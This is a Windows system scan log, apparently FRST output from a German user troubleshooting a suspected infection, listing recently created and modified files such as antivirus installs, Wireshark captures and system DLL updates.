2015-03-26 13:48 - 2015-03-26 13:48 - 00000000 _____ () C:\Users\k\defogger_reenable
2015-03-26 13:30 - 2015-03-26 13:50 - 00000000 ____D () C:\Users\k\Downloads\trojaner anleitung
2015-03-26 13:08 - 2015-03-26 13:08 - 00022928 _____ () C:\Users\k\Downloads\immer noch da die ip.pcapng
2015-03-26 12:56 - 2015-03-26 12:56 - 00001013 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashFXP 5.lnk
2015-03-26 12:56 - 2015-03-26 12:56 - 00001001 _____ () C:\Users\k\Desktop\FlashFXP 5.lnk
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 __HDC () C:\ProgramData\{DDE51F71-DCC9-49C9-8B29-B0C887D41F90}
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 ____D () C:\ProgramData\regid.2000-02.com.flashfxp
2015-03-26 12:56 - 2015-03-26 12:56 - 00000000 ____D () C:\Program Files\FlashFXP 5
2015-03-26 12:53 - 2015-03-26 12:55 - 00000000 __HDC () C:\ProgramData\~0
2015-03-26 12:53 - 2015-03-26 12:53 - 00000000 ____D () C:\Users\k\AppData\Roaming\FlashFXP
2015-03-26 12:50 - 2015-03-26 12:50 - 05580472 _____ (OpenSight Software LLC ) C:\Users\k\Downloads\FlashFXP51_3820_Setup.exe
2015-03-26 11:37 - 2015-03-26 13:05 - 00000000 ____D () C:\Users\k\AppData\Roaming\Wireshark
2015-03-26 11:15 - 2015-03-26 11:15 - 02204892 _____ () C:\Users\k\Downloads\nach flash fxp start.pcapng
2015-03-26 11:03 - 2015-03-26 11:03 - 00001692 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2015-03-26 11:03 - 2015-03-26 11:03 - 00000000 ____D () C:\Program Files\Wireshark
2015-03-26 11:02 - 2015-03-26 11:02 - 23588136 _____ (Wireshark development team) C:\Users\k\Downloads\Wireshark-win32-1.12.4.exe
2015-03-26 09:51 - 2015-03-26 09:52 - 00000955 _____ () C:\Users\k\Desktop\welcher virus löst diese zeile aus.txt
2015-03-26 09:37 - 2015-03-26 09:35 - 00037896 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2015-03-26 09:35 - 2015-03-26 09:35 - 00001111 _____ () C:\Users\Public\Desktop\Avira.lnk
2015-03-26 09:35 - 2015-03-26 09:35 - 00000000 ____D () C:\Users\k\AppData\Roaming\Avira
2015-03-26 09:35 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Package Cache
2015-03-26 09:33 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-03-26 09:33 - 2015-03-26 09:33 - 00002032 _____ () C:\Users\Public\Desktop\Avira Control Center.lnk
2015-03-26 09:32 - 2015-03-26 09:35 - 00000000 ____D () C:\ProgramData\Avira
2015-03-26 09:32 - 2015-03-26 09:35 - 00000000 ____D () C:\Program Files\Avira
2015-03-26 09:32 - 2015-03-17 13:02 - 00028520 _____ (Avira GmbH) C:\Windows\system32\Drivers\ssmdrv.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00136216 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00105864 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2015-03-26 09:32 - 2015-03-17 13:01 - 00037352 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2015-03-26 09:05 - 2015-03-26 09:05 - 00000387 _____ () C:\Users\k\Downloads\boris.txt
2015-03-26 09:01 - 2015-03-25 14:46 - 00254946 _____ () C:\Users\k\Downloads\2014_10_27_HEX_780x420_DE.swf
2015-03-26 09:00 - 2015-03-26 09:00 - 00000000 ____D () C:\Users\k\AppData\Roaming\NetGear
2015-03-25 20:05 - 2015-03-26 13:42 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-03-25 20:05 - 2015-03-25 20:05 - 00001080 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-03-25 20:05 - 2015-03-25 20:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-03-25 20:05 - 2015-03-17 06:15 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-25 20:05 - 2015-03-17 06:15 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-25 20:05 - 2015-03-17 06:15 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-03-25 20:03 - 2015-03-25 20:04 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\k\Downloads\mbam-setup-2.1.4.1018.exe
2015-03-25 19:08 - 2015-03-25 19:08 - 00000000 ____D () C:\Users\k\Documents\ProSafe Plus Utility
2015-03-25 19:06 - 2015-03-25 19:09 - 00000000 ____D () C:\Program Files\Common Files\Adobe AIR
2015-03-25 19:06 - 2015-03-25 19:06 - 00000000 ____D () C:\Users\Default\AppData\Roaming\Macromedia
2015-03-25 19:06 - 2015-03-25 19:06 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\Macromedia
2015-03-25 19:05 - 2015-03-26 11:03 - 00000000 ____D () C:\Program Files\WinPcap
2015-03-25 19:05 - 2015-03-25 19:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2015-03-25 19:04 - 2015-03-25 19:04 - 00002775 _____ () C:\Users\Public\Desktop\ProSafe Plus Utility.lnk
2015-03-25 19:04 - 2015-03-25 19:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetGear
2015-03-25 19:04 - 2015-03-25 19:04 - 00000000 ____D () C:\Program Files\NetGear
2015-03-24 21:17 - 2015-03-11 04:30 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-03-24 21:17 - 2015-03-11 04:30 - 00534528 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00818176 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00202752 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-03-24 21:17 - 2015-03-11 04:29 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-03-24 21:17 - 2015-03-11 04:26 - 00892928 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-03-24 13:50 - 2015-03-24 13:50 - 12207863 _____ () C:\Users\k\Downloads\d013dad9 (1).sql
2015-03-24 13:49 - 2015-03-24 13:49 - 12207863 _____ () C:\Users\k\Downloads\d013dad9.sql
2015-03-24 13:01 - 2015-03-24 13:01 - 00009858 _____ () C:\Users\k\Downloads\d0142acc nur strucktur.sql
2015-03-24 12:16 - 2015-03-24 12:17 - 52975801 _____ () C:\Users\k\Downloads\d0142acc.sql
2015-03-23 13:36 - 2015-03-26 12:26 - 00235312 _____ () C:\Windows\PFRO.log
2015-03-23 13:36 - 2015-03-26 12:26 - 00000168 _____ () C:\Windows\setupact.log
2015-03-23 13:36 - 2015-03-23 13:36 - 00000000 _____ () C:\Windows\setuperr.log
2015-03-23 11:10 - 2015-03-23 11:10 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-03-20 18:35 - 2015-03-20 18:55 - 00000000 ____D () C:\Users\k\Downloads\Texte
2015-03-14 16:22 - 2015-03-14 16:22 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anti-Twin.lnk
2015-03-14 16:21 - 2015-03-14 16:21 - 00000000 ____D () C:\Program Files\AntiTwin
2015-03-14 16:03 - 2015-03-16 15:45 - 00000000 ____D () C:\Users\k\AppData\Roaming\TeamViewer
2015-03-10 21:55 - 2015-02-24 03:32 - 00342696 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-03-10 21:55 - 2015-02-21 01:41 - 12827648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-03-10 21:55 - 2015-02-21 01:27 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-03-10 21:55 - 2015-02-21 01:27 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-03-10 21:55 - 2015-02-21 01:25 - 19720192 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-03-10 21:55 - 2015-02-21 00:32 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-03-10 21:55 - 2015-02-20 03:22 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-03-10 21:55 - 2015-02-20 03:22 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-03-10 21:55 - 2015-02-20 03:09 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-03-10 21:55 - 2015-02-20 03:08 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-03-10 21:55 - 2015-02-20 03:08 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-03-10 21:55 - 2015-02-20 03:06 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-03-10 21:55 - 2015-02-20 03:03 - 02278400 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-03-10 21:55 - 2015-02-20 03:01 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-03-10 21:55 - 2015-02-20 03:00 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-03-10 21:55 - 2015-02-20 02:58 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-03-10 21:55 - 2015-02-20 02:56 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-03-10 21:55 - 2015-02-20 02:56 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-03-10 21:55 - 2015-02-20 02:56 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-03-10 21:55 - 2015-02-20 02:50 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-03-10 21:55 - 2015-02-20 02:41 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-03-10 21:55 - 2015-02-20 02:37 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-03-10 21:55 - 2015-02-20 02:30 - 04300288 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-03-10 21:55 - 2015-02-20 02:24 - 02052608 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-03-10 21:55 - 2015-02-20 02:24 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-03-10 21:55 - 2015-02-20 02:24 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-03-10 21:55 - 2015-02-20 02:23 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-03-10 21:55 - 2015-02-20 02:01 - 01888256 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-03-10 21:55 - 2015-02-20 01:57 - 01311232 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-03-10 21:55 - 2015-02-20 01:55 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-03-10 21:49 - 2015-02-03 04:12 - 01230848 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-03-10 21:49 - 2015-01-31 04:33 - 02744320 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-03-10 21:49 - 2015-01-31 04:33 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-03-10 21:49 - 2015-01-31 01:48 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-03-10 21:48 - 2015-02-26 04:11 - 02381312 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-03-10 21:48 - 2015-02-13 06:26 - 12875264 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-03-10 21:48 - 2015-01-17 03:30 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-03-10 21:43 - 2015-03-06 06:15 - 00137656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-03-10 21:43 - 2015-03-06 06:15 - 00067512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-03-10 21:43 - 2015-03-06 06:10 - 01061376 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-03-10 21:43 - 2015-03-06 06:10 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-03-10 21:43 - 2015-03-06 06:09 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-03-10 21:43 - 2015-03-06 06:09 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-03-10 21:43 - 2015-03-06 06:07 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-03-10 21:43 - 2015-03-06 06:07 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-03-10 21:43 - 2015-03-06 06:06 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00026624 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2015-03-10 21:43 - 2015-02-20 05:13 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2015-03-10 21:43 - 2015-02-20 04:09 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-03-10 21:43 - 2015-02-04 03:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-03-10 21:43 - 2015-02-03 04:16 - 03973048 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-03-10 21:43 - 2015-02-03 04:16 - 03917760 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-03-10 21:43 - 2015-02-03 04:16 - 00078784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2015-03-10 21:43 - 2015-02-03 04:12 - 11411968 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 03209728 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2015-03-10 21:43 - 2015-02-03 04:12 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00475136 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 
00103936 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2015-03-10 21:43 - 2015-02-03 04:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll 2015-03-10 21:43 - 2015-02-03 04:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx 2015-03-10 21:43 - 2015-02-03 04:12 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll 2015-03-10 21:43 - 2015-02-03 04:11 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL 2015-03-10 21:43 - 2015-02-03 04:11 - 00262656 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00050176 _____ (Microsoft 
Corporation) C:\Windows\system32\rrinstaller.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe 2015-03-10 21:43 - 2015-02-03 04:11 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe 2015-03-10 21:43 - 2015-02-03 04:10 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll 2015-03-10 21:43 - 2015-02-03 04:09 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll 2015-03-10 21:43 - 2015-02-03 04:08 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2015-03-10 21:43 - 2015-02-03 04:00 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys 2015-03-10 21:43 - 2015-02-03 03:26 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2015-03-10 21:43 - 2015-01-31 00:56 - 00370488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2015-03-10 21:43 - 2014-10-31 23:22 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe 2015-03-10 21:43 - 2014-06-28 01:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe 2015-03-10 21:43 - 2014-06-28 01:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2015-03-09 13:28 - 2015-03-09 13:28 - 00000000 _____ () C:\Users\k\Desktop\kleiner pc piept auch selbst wenn er aus ist vermutlich mainboar.txt 2015-02-27 11:59 - 2015-02-27 12:00 - 00000000 ____D () C:\Program Files\DJI Product 2015-02-27 11:59 - 2015-02-27 11:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DJI Product 2015-02-25 03:00 - 2015-01-09 00:44 - 00419936 _____ () C:\Windows\system32\locale.nls ==================== One Month Modified Files and Folders ======= (If 
an entry is included in the fixlist, the file\folder will be moved.) 2015-03-26 13:48 - 2014-12-12 14:10 - 00000000 ____D () C:\Users\k 2015-03-26 13:34 - 2014-12-12 14:10 - 01152762 _____ () C:\Windows\WindowsUpdate.log 2015-03-26 13:22 - 2014-12-12 17:11 - 00001098 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2015-03-26 13:18 - 2014-12-12 14:10 - 00000000 ____D () C:\Users\k\AppData\Local\VirtualStore 2015-03-26 13:05 - 2014-12-12 14:24 - 00000884 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2015-03-26 12:53 - 2014-12-12 18:36 - 00000000 ____D () C:\ProgramData\FlashFXP 2015-03-26 12:47 - 2014-12-12 17:47 - 00000000 ____D () C:\Users\k\AppData\Roaming\ICQ 2015-03-26 12:34 - 2009-07-14 05:34 - 00021856 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-03-26 12:34 - 2009-07-14 05:34 - 00021856 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-03-26 12:26 - 2014-12-12 17:11 - 00001094 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2015-03-26 12:26 - 2014-12-12 14:43 - 00000000 ____D () C:\ProgramData\NVIDIA 2015-03-26 12:26 - 2009-07-14 05:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2015-03-26 12:25 - 2014-12-14 17:14 - 00000000 ____D () C:\Windows\pss 2015-03-25 20:38 - 2014-12-12 17:47 - 00000000 ____D () C:\ProgramData\ICQ 2015-03-25 19:08 - 2014-12-12 15:49 - 00000000 ____D () C:\ProgramData\Adobe 2015-03-25 19:08 - 2014-12-12 14:24 - 00000000 ____D () C:\Users\k\AppData\Roaming\Adobe 2015-03-25 19:06 - 2014-12-12 16:52 - 00000000 ____D () C:\Program Files\Adobe 2015-03-25 19:05 - 2014-12-12 15:47 - 00000000 ____D () C:\Users\k\AppData\Local\Adobe 2015-03-25 19:04 - 2014-12-12 14:33 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information 2015-03-25 08:57 - 2014-12-12 15:11 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service 2015-03-25 03:01 - 2014-12-12 17:09 - 00000000 
___SD () C:\Windows\system32\CompatTel 2015-03-25 03:01 - 2014-12-12 17:09 - 00000000 ____D () C:\Windows\system32\appraiser 2015-03-23 18:46 - 2014-12-14 17:51 - 00000000 ____D () C:\Users\k\Werbung 2015-03-23 09:29 - 2014-12-14 18:53 - 00000000 ____D () C:\Users\k\Downloads\post 2015-03-21 12:23 - 2014-12-12 14:24 - 00778928 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2015-03-21 12:23 - 2014-12-12 14:24 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2015-03-20 12:16 - 2014-12-12 16:50 - 00000000 ____D () C:\Users\k\AppData\Local\.MaxTalk 2015-03-19 15:52 - 2014-12-22 11:51 - 00000091 _____ () C:\Users\k\Desktop\test.html 2015-03-19 09:55 - 2014-12-14 18:53 - 00000810 _____ () C:\Users\k\Downloads\407382835 2015-03-19 09:43 - 2015-02-17 03:29 - 00000000 ____D () C:\Users\k\AppData\Roaming\iFunbox_UserCache 2015-03-18 19:00 - 2014-12-14 18:52 - 00000000 ____D () C:\Users\k\Downloads\alter müll 2015-03-16 12:51 - 2009-07-14 05:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2015-03-14 16:39 - 2014-12-14 17:50 - 00000000 ____D () C:\Users\k\PersBackup 2015-03-11 12:43 - 2009-07-14 03:37 - 00000000 ____D () C:\Windows\rescache 2015-03-11 09:00 - 2009-07-14 05:33 - 00459888 _____ () C:\Windows\system32\FNTCACHE.DAT 2015-03-11 03:26 - 2009-07-14 03:37 - 00000000 ____D () C:\Windows\system32\de-DE 2015-03-11 03:11 - 2014-12-12 15:25 - 00000000 ____D () C:\Windows\system32\MRT 2015-03-11 03:08 - 2014-12-12 15:25 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2015-03-07 15:18 - 2014-12-12 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brother P-touch 2015-03-03 13:01 - 2014-12-14 17:50 - 00000000 ____D () C:\Users\k\Solar 2015-02-24 04:23 - 2014-12-12 15:04 - 00246920 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe ==================== Files in the root of some directories ======= 
1999-03-11 18:22 - 1999-03-11 18:22 - 0099840 _____ (Symantec Corp.) C:\Program Files\Common Files\IRAABOUT.DLL 1998-12-09 03:53 - 1998-12-09 03:53 - 0048640 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRALPTTR.DLL 1998-12-09 03:53 - 1998-12-09 03:53 - 0070144 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAMDMTR.DLL 1998-12-09 03:53 - 1998-12-09 03:53 - 0186368 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAREG.DLL 1998-12-09 03:53 - 1998-12-09 03:53 - 0017920 _____ (Symantec Corp.) C:\Program Files\Common Files\IRASRIAL.DLL 1998-12-09 03:53 - 1998-12-09 03:53 - 0031744 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAWEBTR.DLL 2014-12-14 03:24 - 2014-12-14 03:24 - 0000036 _____ () C:\Users\k\AppData\Local\housecall.guid.cache Some content of TEMP: ==================== 